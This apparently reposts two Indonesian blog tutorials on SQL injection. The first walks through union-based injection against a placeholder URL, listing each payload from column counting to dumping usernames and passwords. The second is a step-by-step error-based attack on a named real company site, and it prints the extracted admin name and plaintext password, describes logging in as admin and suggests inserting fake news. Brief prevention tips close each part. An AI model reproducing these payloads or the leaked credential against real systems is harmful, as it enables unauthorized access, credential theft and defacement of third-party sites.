Tabel pada database mempunyai jumlah kolom/field yg bebeda/sama. Misal kita ingin menampilkan 8 buah field pada tabel yang hanya memiliki 7 buah field saja, maka Query SQL yg diproses akan menghasilkan eror, karena jumlah kolom/field tidak cocok atau NOT MATCH. Bagaimana kita mencari jumlah kolom/field pada tabel tsb? Yaitu dengan memakai syntax SQL ORDER BY. Misal :

http://www.target.com/apaajah.php?news=32 ORDER BY 3--

Syntax SQL yg ditambahkan pada URL tsb akan menampilkan nomor kolom ke 3 pada Query SQL yg dijalankan. Selama jumlah kolom/field yg kita masukkan pada ORDER BY masih kurang atau sama dengan jumlah kolom/field pada database maka TIDAK akan menghasilkan eror. Bila terjadi eror, maka dapat kita tarik kesimpulan kalo jumlah kolom/field pada database web tsb kurang dari nilai ORDER BY yg kita masukkan, misal

http://www.target.com/apaajah.php?news=32 ORDER BY 11--

Akan menghasilkan eror bahwa jumlah kolom/field tidak cocok, maka jumlah kolom/field pada database web KURANG DARI 11 (entah itu 10, 9 ,,,,).. Cobalah memasukkan nilai kurang dari 11 secara berurutan, 10, 9 , 8, ... hingga tidak timbul eror.

3. Menampilkan kolom/field yang bisa dpakai untuk SQL Injection
Misal pada ORDER BY 10 kita tidak mendapatkan eror, maka selanjutna kita akan mencari nomor kolom/filed keberapa yg dapat kita sisipkan Query SQL Injection. Contoh :

http://www.target.com/apaajah.php?news=-1 union select 1,2,3,4,5,6,7,8,9,10--

Perhatikan parameter news diubah nilaina menjadi -1, karena kita akan menggunakan Query SQL injection kita (-1 tidak terpadat pada news_id). Sedangkan UNION SELECT akan memproses data yg kita inginkan berdasarkan jumlah kolom yg kita masukkan, dalam hal ini kita mengecek nomor kolom dari 1 sampai 10.
Bila tampil hasil pada web, maka nomor kolom tersebut yg bisa kita pakai untuk langkah selanjutna

4. Menampilkan informasi/data
Bila hasil yang kita dapat misalkan 2, maka pada nomor kolom 2 bisa kita masukkan syntax/fungsi SQL kedalam URL tsb, contoh :

http://www.target.com/apaajah.php?news=-1 union select 1,database(),3,4,5,6,7,8,9,10--

Query SQL tersebut akan menampilkan nama database yang sedang terkoneksi. Fungsi SQL lain yg bisa dipakai diantarana :

* version(): current mysql version
* database(): current database where user is connected
* user(): connected to the database
* system_user(): obvious
* session_user()
* current_user()
* last_insert_id()
* connection_id()
* etc.

5. Menampilkan nama2 tabel pada database
Dengan menggunakan Query SQL information_schema.tables bisa kita dapatkan nama2 tabel yg ada di database web tsb, contoh :

http://www.target.com/apaajah.php?news=-1 union select 1,table_name,3,4,5,6,7,8,9,10 from information_schema.tables--

Maka kita akan dapatkan nama2 tabel

6. Menampilkan nama2 kolom pada tabel
Query SQL yg digunakan adalah information_schema.columns, misal kita pilih tabel users yg kita dapatkan pada hasil diatas :

http://www.target.com/apaajah.php?news=-1 union select 1,column_name,3,4,5,6,7,8,9,10 from information_schema.columns where table_name=users--

7. Menampilkan data dari tabel
Dari hasil diatas, dapat kita explorasi lebih lanjut untuk mengetahui username + password pada tabel users, contoh :

http://www.target.com/apaajah.php?news=-1 union select 1,concat(username,password),3,4,5,6,7,8,9,10 from users--

Maka kita akan dapatkan data username + password dari semua user

Tips untuk mencegah SQL Injection
1. Selalu gunakan pengecekan terhadap parameter inputan
2. Gunakan fungsi regex pada koding web untuk menghilangkan karakter/simbol khusus dari
nilai parameter inputan
3. Kalo bisa hilangkan show error mysql pada konfigurasi PHP

sumber : http://community.gunadarma.ac.id/blog/view/id_82/title_howto-sql-injection/

SQL Injection

2009-05-04T00:49:00.000-07:00

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.

Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )

sumber : http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7